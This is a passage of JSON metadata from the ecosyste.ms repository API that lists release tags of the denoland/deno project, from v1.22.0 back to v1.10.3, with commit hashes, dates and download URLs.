os.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denol